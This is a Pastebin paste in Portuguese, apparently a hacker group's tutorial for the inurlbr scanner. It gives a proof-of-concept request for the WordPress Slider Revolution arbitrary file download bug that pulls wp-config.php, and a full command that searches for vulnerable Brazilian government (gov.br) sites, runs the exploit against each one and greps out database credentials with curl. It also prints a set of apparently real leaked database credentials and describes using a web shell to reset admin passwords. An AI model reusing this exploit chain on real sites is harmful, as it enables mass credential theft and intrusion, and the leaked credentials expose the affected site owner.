SHARE
TWEET

Aula inurlbr

0x4h4x Aug 4th, 2014 1,109 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###############################################################################
  2. #0x 0xNeither war between hackers, nor peace for the system.                  #
  3. #                                                                             #
  4. #0x An4rchist H4x0rs                                                          #
  5. #                                                                             #
  6. #0x Exploração                                                                #
  7. #                                                                             #
  8. #Bug Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download  #
  9. #                                                                             #
  10. #Poc                                                                          #
  11. #http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-#config.php                                                                   #
  12. ###############################################################################
  13.  
  14. https://www.facebook.com/AAh4x0r
  15. https://www.facebook.com/InurlBrasil
  16. http://an4rchisth4x0r.org/
  17. http://blog.inurl.com.br/
  18. Inurlbr beta http://pastebin.com/H1jNfdeB
  19.  
  20.  
  21. 0xNeither war between hackers, nor peace for the system.
  22.  
  23.  
  24. Salve Salve criançada tio 0x4h4x fazendo uma pequena vídeo explorando um bug relativamente novo no cenário.
  25.  
  26. Bom vamos lá
  27.  
  28. Comando
  29.  
  30. ./inurlbr.php --dork 'site:gov.br  "revslider"  "/revslider/"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
  31.  
  32.  
  33.                      0x Explicação ~~~
  34.  
  35. --dork = dork que o inurlbr utilizara para fazer a pesquisa
  36. -q = motores de busca 1,6 são os motores que serão utilizado
  37. -s arquivo de saída com as urls vulneráveis
  38. -u extração de url contidas nas paginas para analises futuras
  39.  
  40.  
  41. --exploit-get ou exploit-post faz a exploração via post ou via get
  42. --comand-all Executa comandos no terminal para todas URLS encontradas. no nosso caso sera o comando curl  
  43.  
  44. "curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'"
  45.  
  46. _TARGETFULL_ será substituído por pelo URL/alvo encontrado será mantido a URL/alvo original encontrada
  47.  
  48. --exploit-comand Define exploit/parâmetro será executado nas opções
  49.  
  50.                                     0x Bug
  51.  
  52. O bug consiste em uma falha que permite o download do arquivo de configurações do wordpres (wp-config.php) este arquivo contem informações frágeis sobre as databases sendo elas
  53.  
  54. define('DB_NAME', 'lojaphos'); Nome do banco de dados
  55. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
  56. define('DB_PASSWORD', 'silva2805'); Senha do banco
  57. define('DB_HOST', 'mysql.phosloja.com.br'); host normalmente essa parte vira como localhost mas em 90% das vezes usando o domínio alvo a conexão é bem sucedida!
  58.  
  59. A maneira que a vídeo aula aborda para a exploração é um reset pass ou inset pass para fazer isso podemos utilizar uma Web shell no meu caso uso a 1n73ction Shell
  60.  
  61. Como viram o inurlbr esta executando o comando em todas as urls para fazemos a seleção do usuario e senha vamos a shell que esta upada em um dos meus hosts mas apagarei apos a video aula irei demostra apenas como faz para não toma strike no video :)
  62.  
  63. Bom galera é so deixarei esse txt na descrição que vai que nem todos conseguiram ler no video
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top